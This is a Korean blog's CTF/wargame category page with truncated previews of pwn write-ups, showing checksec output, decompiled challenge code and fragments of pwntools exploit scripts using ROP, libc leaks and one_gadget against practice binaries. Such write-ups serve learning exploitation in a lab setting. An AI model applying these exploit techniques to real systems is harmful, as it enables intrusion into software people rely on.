목록Wargame & CTF (43)
메로나
보호되어 있는 글입니다.

보호기법은 다 걸려있고 아이다로 까보면 아래와 같다. unsigned __int64 __fastcall generate_key(int a1) { int i; // [rsp+18h] [rbp-58h] int fd; // [rsp+1Ch] [rbp-54h] char s[72]; // [rsp+20h] [rbp-50h] BYREF unsigned __int64 v5; // [rsp+68h] [rbp-8h] v5 = __readfsqword(0x28u); if ( a1 > 0 && (unsigned int)a1
1. misc - optimizer 처음 25문제는 하노이탑 움직이는 횟수고 다음 25문제는 머지소트 움직이는 횟수이다. 그냥 맞춰서 보내주면 된다. from pwn import * import ast context.log_level = 'debug' p = remote('207.180.200.166', 9660) p.recvline() p.recvline() def merge_list(left,right): result = list() i,j = 0,0 inv_count = 0 while i 16) & 0xffff one_gadget_high = (one_gadget >> 32) & 0xffff low = one_gadge..

문제 바이너리 필요하신분 있으면 가져가세용 ~_~ 1. wewantourmoneyback 1. 보호기법 체크 ➜ wewantourmoneyback checksec wewantourmoneyback [*] '/root/pwn/KERT/wewantourmoneyback/wewantourmoneyback' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) 2. Hex-Ray int __cdecl main(int argc, const char **argv, const char **envp) { unsigned int v3; // eax int v5; // [esp+0h] [eb..
__libc_csu_init 에 들어있는 가젯들을 이용해 이리저리 움직이는 기법이 RTC이다. ROP해도 되는데 RTC 해봤다. 1. 보호기법 체크 ➜ RTC checksec rtc [*] '/root/pwn/HackCTF/RTC/rtc' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) 까나리 파이 없고 NX만 잇따 2. Hex-Ray int __cdecl main(int argc, const char **argv, const char **envp) { char buf; // [rsp+0h] [rbp-40h] setvbuf(stdin, 0LL, 2, 0LL); writ..

부제 - 와! syscall 아시는구나! 1. 보호기법 체크 ➜ sysrop checksec sysrop [*] '/root/pwn/HackCTF/sysrop/sysrop' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) 까나리 파이 없고 NX 켜져있당 2. Hex-Ray 아니 헥스레이 키기전에 봐야할거 있음 아니 왜 이거밖에 없냐 해서 보니까 stripped 되어있음 쓸게 read랑 setvbuf 뿐임;;; 그래서 어카지 했는데 그 문제 이름에 보면 요상하게 힌트가 있음 문제 이름이 SysROP 니까 뭔가 syscall 을 떠올릴 수가 있음 ㅇㅇ... rax를 제대로..

아니 처음 풀었을 때랑 다르게 풀었는데 이상하게 이거 풀렸음 머지 1. 보호기법 체크 ➜ unexploitable1 checksec Unexploitable_1 [*] '/root/pwn/HackCTF/unexploitable1/Unexploitable_1' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) 2. Hex-Ray int __cdecl main(int argc, const char **argv, const char **envp) { char s[16]; // [rsp+0h] [rbp-10h] BYREF setvbuf(stdout, 0LL, 2, 0LL); s..

걍 x86 ROP임 슥삭 하면됨 1. Exploit from pwn import * p = remote('ctf.j0n9hyun.xyz', 3021) #p = process('./rop') e = ELF('./rop') #libc = e.libc libc = ELF('libc.so.6') write_plt = e.plt['write'] write_got = e.got['write'] pppr = 0x08048509 payload = "A" * (0x88 + 4) payload += p32(write_plt) payload += p32(pppr) payload += p32(1) payload += p32(write_got) payload += p32(4) payload += p32(e.symbols['ma..